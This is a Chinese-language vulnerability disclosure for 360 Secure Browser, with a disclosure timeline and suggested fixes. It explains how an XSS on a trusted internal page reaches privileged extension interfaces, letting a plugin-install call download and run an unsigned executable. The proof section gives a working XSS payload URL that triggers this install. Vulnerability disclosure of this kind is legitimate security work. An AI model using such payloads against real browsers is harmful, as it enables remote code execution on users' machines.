漏洞详情
披露状态:
-07-15: 细节已通知厂商并且等待厂商处理中
-08-18: 细节向公众公开
简要描述:
360安全浏览器(360SE)是互联网上好用、安全的新一代浏览器,和360安全卫士、360杀毒等软件等产品一同成为360安全中心的系列产品,官方网站在。
在360浏览器中存在一个设计上的问题,结合一些其他的漏洞可能导致远程代码执行。
详细说明:
360浏览器为了扩展自己的功能,在内部实现了一系列的扩展接口,并且通过web可以调用这些接口,但是在跨越安全边界时唯一的检查就是调用的来源,必须为才可以调用这些接口。
通过在网站中漏洞的查找,通过一个xss可以跨越这个边界,从而直接调用这些接口。某些接口如插件支持上可以下载远程的可执行程序直接执行,同时执行的时候并没有对来源应用程序做签名等认证,导致可以直接下载恶意程序执行。
漏洞证明:
/v3/guide/guide_start.htm?ver=3.1.0.8&firstcheck=1&1="><iframe name="fuck" src="/v3/plugins.htm" οnlοad=alert(fuck.window.eval("Install('ExtWebMail','1.1.0.1013','360邮件通','/ExtWebmail.zip','3.1.0.8')"))></iframe>
其中ExtWebmail.zip里自定义的ExtWebmail.exe将会被执行
修复方案:
1 修复xss(无法解决的其他安全问题)
2 验证程序的来源(无法解决其他接口的问题)
如果觉得《360安全浏览器远程代码执行漏洞》对你有帮助,请点赞、收藏,并留下你的观点哦!